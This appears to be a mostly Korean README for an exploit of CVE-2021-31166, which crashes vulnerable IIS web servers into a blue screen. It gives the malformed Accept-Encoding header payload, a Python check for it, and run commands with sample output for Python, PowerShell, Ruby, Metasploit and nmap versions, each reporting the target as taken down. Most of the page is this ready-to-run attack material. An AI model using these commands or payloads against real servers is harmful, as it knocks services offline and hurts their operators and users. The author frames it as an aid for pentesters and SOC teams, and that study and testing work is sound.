
CVE-2021-31166: exploitation with Powershell, Python, Ruby, NMAP and Metasploit.
최근에 CVE-2021-31166에 대한 익스플로잇을 작성했습니다. 이 익스플로잇은 CVE-2021-31166을 악용합니다. 펜테스터는 https://github.com/mauricelambert/CVE-2021-31166 을 사용해야 하지만, SOC 팀에서는 취약점을 제대로 수정하기 위해 특정 취약점을 알아야 합니다. 그래서 이 익스플로잇을 작성했습니다.
취약한 IIS 웹 서버를 공격하기 위해 순수 파이썬, 파워셸, 루비 스크립트와 메타스플로잇, nmap 모듈을 제공합니다 (서버를 다운시키기 위해 DOS 공격을 수행하여 블루 스크린을 유발합니다).
페이로드는 매우 간단합니다:
Accept-Enconding: something, ,something 을 원하는 헤더 값으로 교체하세요Accept-Enconding: (\w|[~/\.-]|%[0-9a-fA-F]{2})+,\s+,파이썬으로 페이로드를 확인하세요:
from re import fullmatch
if fullmatch(r"Accept-Enconding: (\w|[~/\.-]|%[0-9a-fA-F]{2})+,\s+,", "Accept-Enconding: something, ,"):
print("Payload is valid !")
python3 CVE202131166.py
# OR
chmod u+x CVE202131166.py
./CVE202131166.py
python3 CVE202131166.py <target>
# OR
chmod u+x CVE202131166.py
./CVE202131166.py <target>
python3 CVE202131166.py 10.10.10.10
# OR
chmod u+x CVE202131166.py
./CVE202131166.py 10.10.10.10:8000
# OR
python3 CVE202131166.py mywebservername
~# python CVE202131166.py
CVE-2021-31166 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
Target: 10.10.10.10
[+] http://10.10.10.10 is UP. Send payload...
[+] http://10.10.10.10 is DOWN. 10.10.10.10 is vulnerable to CVE-2021-31166.
~#
powershell ./CVE-2021-31166.ps1
powershell ./CVE-2021-31166.ps1 mywebservername
powershell ./CVE-2021-31166.ps1 -Target 10.10.10.10
cmd> powershell ./CVE-2021-31166.ps1
cmdlet CVE-2021-31166.ps1 at command pipeline position 1
Supply values for the following parameters:
target: 10.10.10.10:8000
CVE-2021-31166 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
cmd>
ruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb 10.10.10.10
~# ruby CVE-2021-31166.rb
CVE-2021-31166 Copyright (C) 2022 Maurice Lambert
This program comes with ABSOLUTELY NO WARRANTY.
This is free software, and you are welcome to redistribute it
under certain conditions.
Host (target): 10.10.10.10
[+] Target: 10.10.10.10 is vulnerable and down.
~#
msf6 > use exploit/windows/iis/py_dos_iis_2021_31166
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) > set RPORT 80
RPORT => 80
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) > exploit
[*] Running module against 127.0.0.1
[*] Starting server...
[*] py_dos_iis_2021_31166.py[10.10.10.10:80] - Trying first connection...
[*] py_dos_iis_2021_31166.py[10.10.10.10:80] - First connection OK. Sending payload...
[*] py_dos_iis_2021_31166.py[10.10.10.10:80] - Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/py_dos_iis_2021_31166) >
msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 10.10.10.10
[+] Target is down ! Congratulations !
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) >
nmap -p 80 --script dos_iis_2021_31166 10.10.10.10
~# nmap -p 80 --script dos_iis_2021_31166 10.10.10.10
80/tcp open http
| dos_iis_2021_31166:
| VULNERABLE:
| IIS CVE-2021-31166 DOS
| State: VULNERABLE (Exploitable)
| IDs: CVE:CVE-2021-31166
| The IIS Web Server contains a RCE vulnerability. This script
| exploits this vulnerability with a DOS attack
| (causes a Blue Screen).
|
| Disclosure date: 2021-05-11
| References:
| https://nvd.nist.gov/vuln/detail/CVE-2021-31166
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31166
|_ https://github.com/mauricelambert/CVE-2021-31166
GPL 버전 3에 따라 라이선스가 부여됩니다.